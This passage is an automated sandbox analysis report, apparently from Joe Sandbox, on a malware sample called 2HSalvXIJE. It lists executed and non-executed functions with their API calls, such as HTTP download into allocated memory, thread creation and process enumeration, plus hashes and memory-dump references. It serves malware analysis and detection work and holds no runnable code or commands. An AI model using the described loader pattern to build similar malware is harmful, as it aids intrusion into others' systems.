Opcode ID: f49c4c9a7e10605904a6a10e00f2c520319c1cb0802325312295c4206e11c210
Instruction ID: b1b191c08856ce7a5ac3e1961f061f1fb3c952ac0291ac520aaac2e6cde2bc09
Opcode Fuzzy Hash: f49c4c9a7e10605904a6a10e00f2c520319c1cb0802325312295c4206e11c210
Instruction Fuzzy Hash: BB11E1B2214A80C6F714DF62F84975BBBA0F384749F44412ADB49277A8CB7CC445CF48

Function 03A9CA74 Relevance: 7.8, APIs: 6, Instructions: 296
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03AA5FEC: malloc.LIBCMT ref: 03AA6008

malloc.LIBCMT ref: 03A9CB3B

Part of subcall function 03AAF284: _FF_MSGBANNER.LIBCMT ref: 03AAF2B4
Part of subcall function 03AAF284: _NMSG_WRITE.LIBCMT ref: 03AAF2BE
Part of subcall function 03AAF284: HeapAlloc.KERNEL32 ref: 03AAF2D9
Part of subcall function 03AAF284: _callnewh.LIBCMT ref: 03AAF2F2
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF2FD
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF308

Part of subcall function 03AAC230: _time64.LIBCMT ref: 03AAC254
Part of subcall function 03AAC230: malloc.LIBCMT ref: 03AAC29C
Part of subcall function 03AAC230: strtok.LIBCMT ref: 03AAC300
Part of subcall function 03AAC230: strtok.LIBCMT ref: 03AAC311

Part of subcall function 03AA34A0: _time64.LIBCMT ref: 03AA34AE

Part of subcall function 03AAEAA8: malloc.LIBCMT ref: 03AAEAF8

Part of subcall function 03AAEAA8: realloc.LIBCMT ref: 03AAEB07

Part of subcall function 03A9F3C0: GetLocalTime.KERNEL32 ref: 03A9F3DF

malloc.LIBCMT ref: 03A9CC4A
_snprintf.LIBCMT ref: 03A9CCC1
_snprintf.LIBCMT ref: 03A9CCE7
free.LIBCMT ref: 03A9CEC6

Part of subcall function 03AAAD44: malloc.LIBCMT ref: 03AAAD78
Part of subcall function 03AAAD44: free.LIBCMT ref: 03AAAF2F

Part of subcall function 03AA8E0C: htonl.WS2_32 ref: 03AA8E3D
Part of subcall function 03AA8E0C: htonl.WS2_32 ref: 03AA8E4A

_snprintf.LIBCMT ref: 03A9CD0E

Part of subcall function 03AADA74: Sleep.KERNEL32 ref: 03AADABC
Part of subcall function 03AADA74: ExitThread.KERNEL32 ref: 03AADAC6

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: malloc$_snprintf$_errno_time64freehtonlstrtok$AllocExitHeapLocalSleepThreadTime_callnewhrealloc
String ID:
API String ID: 548016584-0
Opcode ID: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
Instruction ID: 8c2d94f123c8b8981f327af51122cdc09b81b82e8ded9e059b27c3e11540eea2
Opcode Fuzzy Hash: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
Instruction Fuzzy Hash: FDA1017A300B8046EF18FB7AAA507AE7395AB85790F48413B8E9A9F794DF3CC505C710

Function 000D0128 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpOpenRequestA.WININET(00000000,00000000,84400200,00000000), ref: 000D0143
VirtualAlloc.KERNELBASE ref: 000D0328
InternetReadFile.WININET(000D0136,000D0136), ref: 000D0346

Strings

U.;, xrefs: 000D013E

Memory Dump Source

Source File: 00000000.00000002.3883321381.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: AllocFileHttpInternetOpenReadRequestVirtual
String ID: U.;
API String ID: 1187293180-4213443877
Opcode ID: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
Instruction ID: e093d90e11704a09136074875a9385388f860374ac695588df902a519100a8e3
Opcode Fuzzy Hash: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
Instruction Fuzzy Hash: 66116D6034990D0BE66895AE7C9A73A11CAD7D8765F24823FB40EC33D9ED54CC83816A

Function 03A9F014 Relevance: 4.6, APIs: 3, Instructions: 66
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03A9F118: WSAStartup.WS2_32 ref: 03A9F136

WSASocketA.WS2_32 ref: 03A9F042
WSAIoctl.WS2_32 ref: 03A9F08F
closesocket.WS2_32 ref: 03A9F0EE

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: IoctlSocketStartupclosesocket
String ID:
API String ID: 365704328-0
Opcode ID: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
Instruction ID: 48760de233902a02ef58e4161609d4804e5dd2a8b9b9b516a0e20da9665cd654
Opcode Fuzzy Hash: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
Instruction Fuzzy Hash: 1B21E27670478086EB20CF24F58075AB7A9F3887E5F558626DE9D53B88DF3CC1058B00

Function 00401595 Relevance: 4.5, APIs: 3, Instructions: 47
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 004015BC
VirtualProtect.KERNEL32 ref: 004015F6
CreateThread.KERNEL32 ref: 0040161B

Memory Dump Source

Source File: 00000000.00000002.3883643343.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3883624426.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883676568.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883695881.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883714058.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2HSalvXIJE.jbxd

Similarity

API ID: Virtual$AllocCreateProtectThread
String ID:
API String ID: 3039780055-0
Opcode ID: 4aacca1e8eccfaf740ded84acdafb972c0e8b5e828dd24c9fd05ba3d77ec4f75
Instruction ID: a871edb487987511a762a7aedd3aa3d9a3b96542bc8ba466cbe2f33faf2e38cc
Opcode Fuzzy Hash: 4aacca1e8eccfaf740ded84acdafb972c0e8b5e828dd24c9fd05ba3d77ec4f75
Instruction Fuzzy Hash: 3D012B9231558051E7249B73AC08B9AAA91A38DBC9F48C139EF4B5BBA5DA3CC505C708

Function 00401704 Relevance: 4.5, APIs: 3, Instructions: 45
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32 ref: 0040174D
ReadFile.KERNEL32 ref: 00401777
CloseHandle.KERNEL32 ref: 00401784

Memory Dump Source

Source File: 00000000.00000002.3883643343.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3883624426.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883676568.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883695881.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883714058.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2HSalvXIJE.jbxd

Similarity

API ID: File$CloseCreateHandleRead
String ID:
API String ID: 1035965006-0
Opcode ID: a9a6f3105b428fa11eb0a8b9509746e60382a865a5325daa86df34bad7210379
Instruction ID: 40b2c8f30f00ef97869f90130fa51706c158e82a26dd4cfec866ebc6162fc2d5
Opcode Fuzzy Hash: a9a6f3105b428fa11eb0a8b9509746e60382a865a5325daa86df34bad7210379
Instruction Fuzzy Hash: 2101F77531460186E7219B16F90471776A0B394BA4F648339EFA917BD4DB7DC50ACB08

Function 000D02EB Relevance: 3.1, APIs: 2, Instructions: 51
memoryfilenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000D0328
InternetReadFile.WININET(000D0136,000D0136), ref: 000D0346

Memory Dump Source

Source File: 00000000.00000002.3883321381.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: AllocFileInternetReadVirtual
String ID:
API String ID: 3591508208-0
Opcode ID: 0c4b3c184954499b301fc5e1364cbe40f28c8f2fbba5eef1cae31cd560e0e27a
Instruction ID: 8be9750850e3ed20f721b67bddd27907d356ed3eefac224768d611000d8086df
Opcode Fuzzy Hash: 0c4b3c184954499b301fc5e1364cbe40f28c8f2fbba5eef1cae31cd560e0e27a
Instruction Fuzzy Hash: CCF0827134890A0BEA5A95997CA27BA11CBD798315F34503FF44EC3386DD68CC9381AA

Function 000D02FB Relevance: 3.0, APIs: 2, Instructions: 50
memoryfilenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000D0328
InternetReadFile.WININET(000D0136,000D0136), ref: 000D0346

Memory Dump Source

Source File: 00000000.00000002.3883321381.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: AllocFileInternetReadVirtual
String ID:
API String ID: 3591508208-0
Opcode ID: 23787e01cbc604b248ab16a97925da287f1e74e40a204ff267cef244cd4819ce
Instruction ID: f8c9f9965e5efea174506110ae65d098ace5baacffbbad1e942b2cecd93ec06b
Opcode Fuzzy Hash: 23787e01cbc604b248ab16a97925da287f1e74e40a204ff267cef244cd4819ce
Instruction Fuzzy Hash: C7F05E2130894A0BE719A5A9BC667AA12DADB88354F34402FF44EC3386DD58CC87826A

Function 000D0109 Relevance: 1.5, APIs: 1, Instructions: 40
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetConnectA.WININET(00000003,00000003,00000002,00000001), ref: 000D0124

Part of subcall function 000D0128: HttpOpenRequestA.WININET(00000000,00000000,84400200,00000000), ref: 000D0143

Memory Dump Source

Source File: 00000000.00000002.3883321381.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: ConnectHttpInternetOpenRequest
String ID:
API String ID: 1341064763-0
Opcode ID: 2883e40f1aa5997e186a70808e9d2990456f39e3d9283b8ae33a1dcdd3224206
Instruction ID: dc06d0c01263d68d7601c6e482eb56aa9f32e6e19b9708a488b4225b76b9d7d2
Opcode Fuzzy Hash: 2883e40f1aa5997e186a70808e9d2990456f39e3d9283b8ae33a1dcdd3224206
Instruction Fuzzy Hash: 44F09E363E52D02DCB0F1A308A6AA7637A9DF4730972422ADD643CF643E5951D028EE4

Function 000D02D2 Relevance: 1.5, APIs: 1, Instructions: 30
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetReadFile.WININET(000D0136,000D0136), ref: 000D0346

Memory Dump Source

Source File: 00000000.00000002.3883321381.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 753bc9c08bb374111f39a935188952ab648b7e1cbf64c9780712991e10c0232b
Instruction ID: c5a5504f82bfaac4d191afbd1c283585217a53c608dc7cc763c0841647210a72
Opcode Fuzzy Hash: 753bc9c08bb374111f39a935188952ab648b7e1cbf64c9780712991e10c0232b
Instruction Fuzzy Hash: 35E0CD6634464747F72501E17C763A557D8CB95220F280067D468CA642FA99CED7C334

Function 00403040 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

Part of subcall function 004017F8: malloc.MSVCRT ref: 004017B9
Part of subcall function 004017F8: SleepEx.KERNELBASE ref: 004017CD
Part of subcall function 004017F8: GetTickCount.KERNEL32 ref: 004017FC
Part of subcall function 004017F8: CreateThread.KERNEL32 ref: 00401885

SleepEx.KERNELBASE(?,?,?,004013B4), ref: 0040305D

Memory Dump Source

Source File: 00000000.00000002.3883643343.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3883624426.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883676568.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883695881.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883714058.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2HSalvXIJE.jbxd

Similarity

API ID: Sleep$CountCreateThreadTickmalloc
String ID:
API String ID: 345437100-0
Opcode ID: b6d36b54cf31cf0f426623e933f06735054b4a30bed8d9593c1a6858c86775c1
Instruction ID: 8364c3e29ff4e62ba415e97045e67fc6fb748e7a580f304519b0ce082c56ecd4
Opcode Fuzzy Hash: b6d36b54cf31cf0f426623e933f06735054b4a30bed8d9593c1a6858c86775c1
Instruction Fuzzy Hash: B4C022A030208880EF08B3B280AB32E0A080B08388F0C083FEF0B322E28C3CC000030E

Function 036A936B Relevance: 1.4, APIs: 1, Instructions: 136memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 036A94B8

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
Instruction ID: 28404b7ab78173f13b565701a1c3bdb2c934efed93e442bded77710d889b2ccb
Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
Instruction Fuzzy Hash: F8418574618B489FD784EF2CC488A2AB7E1FB98355F54096EF489C7360DB34D881CB42

Non-executed Functions

Function 03AB6514 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 460COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 03AB656A
_errno.LIBCMT ref: 03AB6571
_invalid_parameter_noinfo.LIBCMT ref: 03AB657C

Strings

U, xrefs: 03AB6ADE

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_invalid_parameter_noinfo
String ID: U
API String ID: 3902385426-4171548499
Opcode ID: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
Instruction ID: 4809e5b459737589bd2b5a02991945d27516bdf4e6ef40e6d36f6234ebe9e3b1
Opcode Fuzzy Hash: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
Instruction Fuzzy Hash: BF020232314A8186DB20CF29D5843EAB779F785B48F58012BEA8A47B6ADF3DC545CB11

Function 03AA867C Relevance: 46.6, APIs: 22, Strings: 4, Instructions: 1078processCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 03AA8FA0
CreateToolhelp32Snapshot.KERNEL32 ref: 03AA8FD9
Process32First.KERNEL32 ref: 03AA8FFB

Strings

x86, xrefs: 03AA8FC7, 03AA90B0
%s%d%d%s%s%d, xrefs: 03AA90E0
x64, xrefs: 03AA8FB2, 03AA8FC0
%s%d%d, xrefs: 03AA9046

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: CreateCurrentFirstProcessProcess32SnapshotToolhelp32
String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
API String ID: 718051232-1833344708
Opcode ID: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
Instruction ID: 8e468cfb32d05c25af26154a8bdc3ffe56e4e3d1b6e04b15ee84cafb10252190
Opcode Fuzzy Hash: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
Instruction Fuzzy Hash: BD721C27B15F5086DF28DB2E985477966E8B78A7C0F88412BDD4E87B54EF3CC6818701

Function 03AB2F9C Relevance: 37.4, APIs: 19, Strings: 2, Instructions: 694COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 03AB2FFD

Part of subcall function 03AB1600: _getptd.LIBCMT ref: 03AB1616
Part of subcall function 03AB1600: __updatetlocinfo.LIBCMT ref: 03AB164B
Part of subcall function 03AB1600: __updatetmbcinfo.LIBCMT ref: 03AB1672

_errno.LIBCMT ref: 03AB3002

Part of subcall function 03AB1D18: _getptd_noexit.LIBCMT ref: 03AB1D1C

_fileno.LIBCMT ref: 03AB302F

Part of subcall function 03AB5A54: _errno.LIBCMT ref: 03AB5A5D
Part of subcall function 03AB5A54: _invalid_parameter_noinfo.LIBCMT ref: 03AB5A68

write_multi_char.LIBCMT ref: 03AB366B
write_string.LIBCMT ref: 03AB3688
write_multi_char.LIBCMT ref: 03AB36A5
write_string.LIBCMT ref: 03AB3704
write_string.LIBCMT ref: 03AB373B
write_multi_char.LIBCMT ref: 03AB375D
free.LIBCMT ref: 03AB3771
_isleadbyte_l.LIBCMT ref: 03AB3842
write_char.LIBCMT ref: 03AB3858
write_char.LIBCMT ref: 03AB3879
_errno.LIBCMT ref: 03AB397C
_invalid_parameter_noinfo.LIBCMT ref: 03AB3987

Strings

, xrefs: 03AB363F
@, xrefs: 03AB301B

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID: $@
API String ID: 3318157856-1077428164
Opcode ID: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
Instruction ID: 3bfbd15888e87c4830605cb7b2a9cb9ba8cd943e88fd0f924a8fcd032778f074
Opcode Fuzzy Hash: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
Instruction Fuzzy Hash: AE42F47A6086848AEF25CB19D5543FEABBCB742794F18120BDE8617BD6DB39C580CB01

Function 03AB2528 Relevance: 35.7, APIs: 19, Strings: 1, Instructions: 687COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 03AB2589

Part of subcall function 03AB1600: _getptd.LIBCMT ref: 03AB1616
Part of subcall function 03AB1600: __updatetlocinfo.LIBCMT ref: 03AB164B
Part of subcall function 03AB1600: __updatetmbcinfo.LIBCMT ref: 03AB1672

_errno.LIBCMT ref: 03AB258E

Part of subcall function 03AB1D18: _getptd_noexit.LIBCMT ref: 03AB1D1C

_fileno.LIBCMT ref: 03AB25BB

Part of subcall function 03AB5A54: _errno.LIBCMT ref: 03AB5A5D
Part of subcall function 03AB5A54: _invalid_parameter_noinfo.LIBCMT ref: 03AB5A68

write_multi_char.LIBCMT ref: 03AB2BEB
write_string.LIBCMT ref: 03AB2C08
write_multi_char.LIBCMT ref: 03AB2C25
write_string.LIBCMT ref: 03AB2C84
write_string.LIBCMT ref: 03AB2CBB
write_multi_char.LIBCMT ref: 03AB2CDD
free.LIBCMT ref: 03AB2CF1
_isleadbyte_l.LIBCMT ref: 03AB2DC2
write_char.LIBCMT ref: 03AB2DD8
write_char.LIBCMT ref: 03AB2DF9
_errno.LIBCMT ref: 03AB2EF3
_invalid_parameter_noinfo.LIBCMT ref: 03AB2EFE

Strings

, xrefs: 03AB2BBF

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID:
API String ID: 3318157856-3916222277
Opcode ID: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
Instruction ID: bda7dc1fb1daac65d92c44852e3ac5be7ee9ac7774609592fddefb8d9b000e04
Opcode Fuzzy Hash: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
Instruction Fuzzy Hash: DC32253260868486EB29CF25D5443FEBFBCF746794F18191BDE4A1BA6ADB38C540CB41

Function 036B23E3 Relevance: 30.8, APIs: 15, Strings: 2, Instructions: 1030COMMON

Download Yara Rule

APIs

Part of subcall function 036B0A47: _getptd.LIBCMT ref: 036B0A5D
Part of subcall function 036B0A47: __updatetlocinfo.LIBCMT ref: 036B0A92
Part of subcall function 036B0A47: __updatetmbcinfo.LIBCMT ref: 036B0AB9

_errno.LIBCMT ref: 036B2449

Part of subcall function 036B115F: _getptd_noexit.LIBCMT ref: 036B1163

_fileno.LIBCMT ref: 036B2476

Part of subcall function 036B4E9B: _errno.LIBCMT ref: 036B4EA4
Part of subcall function 036B4E9B: _invalid_parameter_noinfo.LIBCMT ref: 036B4EAF

write_multi_char.LIBCMT ref: 036B2AB2
write_string.LIBCMT ref: 036B2ACF
write_multi_char.LIBCMT ref: 036B2AEC
write_string.LIBCMT ref: 036B2B4B
write_multi_char.LIBCMT ref: 036B2BA4
free.LIBCMT ref: 036B2BB8
_isleadbyte_l.LIBCMT ref: 036B2C89
write_char.LIBCMT ref: 036B2C9F
write_char.LIBCMT ref: 036B2CC0
_errno.LIBCMT ref: 036B2DC3
_invalid_parameter_noinfo.LIBCMT ref: 036B2DCE

Strings

, xrefs: 036B2A86
@, xrefs: 036B2462

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID: $@
API String ID: 3613058218-1077428164
Opcode ID: 0599035506f01076b605f9026c3628a483f4ccd483033c44f83e2593a1d2db07
Instruction ID: 589f64d2381baefdcacd87aa288e719e06b893f9952b72d03b83f5b5d6e68c0a
Opcode Fuzzy Hash: 0599035506f01076b605f9026c3628a483f4ccd483033c44f83e2593a1d2db07
Instruction Fuzzy Hash: D652E531918B498BDB2CDA18C8652FAB7F5FB95740F180A2DD887C7291DA35D8C38F42

Function 036B196F Relevance: 29.0, APIs: 15, Strings: 1, Instructions: 1022COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 036B0A47: _getptd.LIBCMT ref: 036B0A5D
Part of subcall function 036B0A47: __updatetlocinfo.LIBCMT ref: 036B0A92
Part of subcall function 036B0A47: __updatetmbcinfo.LIBCMT ref: 036B0AB9

_errno.LIBCMT ref: 036B19D5

Part of subcall function 036B115F: _getptd_noexit.LIBCMT ref: 036B1163

_fileno.LIBCMT ref: 036B1A02

Part of subcall function 036B4E9B: _errno.LIBCMT ref: 036B4EA4
Part of subcall function 036B4E9B: _invalid_parameter_noinfo.LIBCMT ref: 036B4EAF

write_multi_char.LIBCMT ref: 036B2032
write_string.LIBCMT ref: 036B204F
write_multi_char.LIBCMT ref: 036B206C
write_string.LIBCMT ref: 036B20CB
write_multi_char.LIBCMT ref: 036B2124
free.LIBCMT ref: 036B2138
_isleadbyte_l.LIBCMT ref: 036B2209
write_char.LIBCMT ref: 036B221F
write_char.LIBCMT ref: 036B2240
_errno.LIBCMT ref: 036B233A
_invalid_parameter_noinfo.LIBCMT ref: 036B2345

Strings

, xrefs: 036B2006

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID:
API String ID: 3613058218-3916222277
Opcode ID: 99560b4e6a3ba651302837abcdacc877c80be0c82fbf8e81c16206e006ab6ccb
Instruction ID: 10d9bf242b161ed16abdadd761245c51d23744ae71000f8a63fb871ff7b2d870
Opcode Fuzzy Hash: 99560b4e6a3ba651302837abcdacc877c80be0c82fbf8e81c16206e006ab6ccb
Instruction Fuzzy Hash: D952F731918B499ADB2CCB58C8653F9B7F5FB56340F18066DDA87C7252DA34D8838F82

Function 03AA7B38 Relevance: 26.0, APIs: 10, Strings: 7, Instructions: 545COMMONLIBRARYCODE

Download Yara Rule

APIs

